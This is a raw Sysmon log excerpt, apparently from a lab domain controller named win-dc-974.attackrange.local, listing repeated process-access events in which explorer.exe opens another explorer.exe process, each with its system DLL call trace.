22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 